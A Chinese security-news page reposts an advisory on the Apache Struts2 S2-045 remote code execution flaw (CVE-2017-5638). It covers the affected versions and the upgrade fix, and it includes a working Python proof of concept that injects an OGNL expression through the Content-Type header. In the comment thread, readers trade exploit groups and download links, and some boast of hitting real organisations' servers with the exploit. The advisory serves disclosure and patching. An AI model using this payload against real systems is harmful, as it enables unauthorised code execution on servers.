CVE漏洞中文网

0DayBank一个专门收集整理全球互联网漏洞的公开发布网站
  1. 首页
  2. 百科
  3. 正文

apache struts2

2017年5月23日 837点热度 0人点赞 0条评论
  • 首页
  • 分类阅读
  • 文库
  • 专栏
  • 公开课
  • 商城
  • 漏洞盒子
注册 | 登录
投稿

【漏洞预警】Apache Struts2 曝任意代码执行漏洞 (S2-045,CVE-2017-5638)

漏洞盒子2017-03-07共1383534人围观 ,发现 34 个不明物体漏洞

struts2漏洞截图.png

FreeBuf上次曝Struts 2的漏洞已经是半年多以前的事情了。这次的漏洞又是个RCE远程代码执行漏洞。简单来说,基于Jakarta Multipart解析器进行文件上传时,利用漏洞可进行远程代码执行。 该漏洞由安恒信息Nike Zheng上报。

Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架。

漏洞编号

CVE-2017-5638

漏洞简介

Struts使用的Jakarta解析文件上传请求包不当,当远程攻击者构造恶意的Content-Type,可能导致远程命令执行。

实际上在default.properties文件中,struts.multipart.parser的值有两个选择,分别是jakarta和pell(另外原本其实也有第三种选择cos)。其中的jakarta解析器是Struts 2框架的标准组成部分。默认情况下jakarta是启用的,所以该漏洞的严重性需要得到正视。

影响范围

Struts 2.3.5 – Struts 2.3.31

Struts 2.5 – Struts 2.5.10

修复方案

如果你正在使用基于Jakarta的文件上传Multipart解析器,请升级到Apache Struts 2.3.32或2.5.10.1版;或者也可以切换到不同的实现文件上传Multipart解析器。

漏洞盒子流行漏洞检测 与 网藤风险感知 已支持对该漏洞的检测,申请免费使用

漏洞PoC

import requests

import sys

def poc(url):

payload = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(#ros.println(102*102*102*99)).(#ros.flush())}"

headers = {}

headers["Content-Type"] = payload

r = requests.get(url, headers=headers)

if "105059592" in r.content:

return True

return False

if __name__ == '__main__':

if len(sys.argv) == 1:

print "python s2-045.py target"

sys.exit()

if poc(sys.argv[1]):

print "vulnerable"

else:

print "not vulnerable"

* 参考来源:Apache,转载请注明来自FreeBuf.COM

漏洞盒子

漏洞盒子95 篇文章等级: 7级
|
|
  • 上一篇:【更新PoC】潜伏11年的Linux内核提权漏洞曝光
  • 下一篇:关于Apache Struts2(S2-045)漏洞情况的通报

这些评论亮了

  • hackyzh(1级)回复
    安恒对struts2的研究挺厉害的啊
    )9(亮了
  • maxshell(1级)回复
    535114467,群文件里面已经有exp了,poc也出了 大佬们过来搞事
    )8(亮了
  • poc回复
    Poc呢 :mrgreen:
    )6(亮了
  • 求Apache Struts 2.3.32下载回复
    求Apache Struts 2.3.32下载地址。
    )6(亮了
  • xsser回复
    两会搞事情呀
    )6(亮了
发表评论

已有 34 条评论

  • hackyzh (1级) 2017-03-07回复1楼

    安恒对struts2的研究挺厉害的啊

    亮了(9)
    • !!! 2017-03-07回复

      @ hackyzh  这是安恒发现的,你这是忽悠人?

      亮了(4)
      • dophc (1级) 2017-03-07回复

        @ !!! 貌似真是安恒研究院搞得

        亮了(6)
  • test124 (2级)系统加载失败,请重新刷新下试试。 2017-03-07回复2楼

    火钳留名

    亮了(5)
  • poc 2017-03-07回复3楼

    Poc呢 :mrgreen:

    亮了(6)
  • dalao大屌 2017-03-07回复4楼

    没POC都是耍流氓 = =

    亮了(3)
  • 求Apache Struts 2.3.32下载 2017-03-07回复5楼

    求Apache Struts 2.3.32下载地址。

    亮了(6)
  • xsser 2017-03-07回复6楼

    两会搞事情呀

    亮了(6)
  • FreeBuf 2017-03-07回复7楼

    转发微博

    亮了(4)
  • anting (3级)愿用十倍努力换成功一个 2017-03-07回复8楼

    二会别搞事情呀

    亮了(5)
    • 我是二货 2017-03-07回复

      @ anting  +1

      亮了(4)
  • Apache Struts 2.3.32 在哪能下到? 2017-03-07回复9楼

    @ 求Apache Struts 2.3.32下载

    亮了(4)
  • maxshell (1级) 2017-03-07回复10楼

    535114467,群文件里面已经有exp了,poc也出了 大佬们过来搞事

    亮了(8)
    • 自律 (5级) 2017-03-07回复

      @ maxshell  以get

      亮了(2)
    • cwlohome (1级)这家伙太懒了,还未填写个人描述! 2017-03-07回复

      @ maxshell  以进群潜水~

      亮了(3)
  • gtl (1级) 2017-03-07回复11楼

    6666

    亮了(3)
  • 就不告诉你 2017-03-07回复12楼

    poc http://ge.tt/5OjOU9j2

    亮了(4)
  • dophc (1级) 2017-03-07回复13楼

    貌似发现了个url,试了下,竟然是root :wink:
    这就尴尬了

    亮了(5)
  • Apache Struts 2.3.32 在哪能下到? 2017-03-07回复14楼

    Apache Struts 2.3.32 在哪能下到?

    亮了(3)
  • plane636 (4级) 2017-03-07回复15楼

    求Apache Struts 2.3.32下载

    亮了(4)
  • VicLevin (1级)追寻黎明前的黑暗,感受暴风前的宁静 2017-03-07回复16楼

    一大堆大佬正在赶来

    亮了(4)
  • plane636 (4级) 2017-03-07回复17楼

    下载地址:https://github.com/apache/struts/releases

    亮了(5)
  • XChen (1级) 2017-03-07回复18楼

    朋友圈都被这个刷屏了

    亮了(3)
  • 义水黄沙 2017-03-07回复19楼

    关注下

    亮了(0)
  • 豆浆包子 2017-03-08回复20楼

    这货漏洞一个接着一个。

    亮了(0)
  • dawner (9级)黎明已经过去,黑暗就在眼前! 2017-03-08回复21楼

    我只能说,这帮刷洞为生的人手贼快 :arrow:

    亮了(1)
  • anything24 2017-03-08回复22楼

    https版的命令执行,请叫我雷锋http://www.reg008.com/forum/forum.php?mod=viewthread&tid=9&extra=

    亮了(2)
  • fuck script kiddies 2017-03-08回复23楼

    你们这群script kiddies,过来扫啊,直接ban你们

    亮了(1)
  • Sophone 2017-03-08回复24楼

    2.3.16.3版本没发现这个问题,求大神解释

    亮了(0)
  • 遗憾哥 2017-03-08回复25楼

    刚拿EXP试了下中国X寿,发现效果杠杠滴,泡碗面吃饱了准备来搞条大的,你妹的已经堵上了 。。。

    亮了(0)
  • 彭雨菲yang 2017-03-09回复26楼
    亮了(0)
  • TKing 2017-03-09回复27楼

    https://github.com/generalthink/Struts2-S2-045-Problem-Solve

    漏洞解决方案

    亮了(0)
  • freedom1027 2017-03-09回复28楼
    亮了(1)
  • 彭菲1027 2017-03-09回复29楼
    亮了(0)

必须您当前尚未登录。登陆?注册

必须(保密)

表情插图

取消

漏洞盒子

漏洞盒子

互联网安全测试平台

95 篇文章4 条评论

相关阅读

  • 【漏洞预警】Apache Struts2 曝任意代码执行漏洞 (S2-045,CVE-2017-5638)
  • Struts2安全漏洞频出 ,多因Apache官方代码编写不严谨
  • 眼见不一定为实:苹果Safari浏览器曝URL欺诈漏洞
  • 从安全漏洞看印度国家银行APP为何“技术落后10年”
  • 三星Galaxy手机输入法曝高危漏洞,攻击者可监控用户摄像头、短信以及安装恶意程序

特别推荐

关注我们 分享每日精选文章

不容错过

  • 跨平台版中国菜刀Cknife发布Chora2015-12-27
  • 把脑洞印在T恤上——2016年FreeBuf T恤征集活动DearJJJ2016-05-27
  • 这真的不是科幻大片! HACK DEMO环节主角招募中shiery02072016-11-10
  • 漫谈流量劫持渔村安全2016-05-18

FREEBUF

  • 免责声明
  • 关于我们
  • 加入我们

广告及服务

  • 寻求报道
  • 广告合作
  • 联系我们
  • 友情链接

关注我们

  • 官方微信
  • 新浪微博
  • 腾讯微博
  • Twitter

赞助商

Copyright © 2013 WWW.FREEBUF.COM All Rights Reserved 沪ICP备13033796号

css.php

正在加载中...

0daybank

标签: 暂无
最后更新:2017年5月23日

小助手

这个人很懒,什么都没留下

点赞
< 上一篇
下一篇 >

文章评论

您需要 登录 之后才可以评论

COPYRIGHT © 2024 www.pdr.cn CVE漏洞中文网. ALL RIGHTS RESERVED.

鲁ICP备2022031030号

联系邮箱:wpbgssyubnmsxxxkkk@proton.me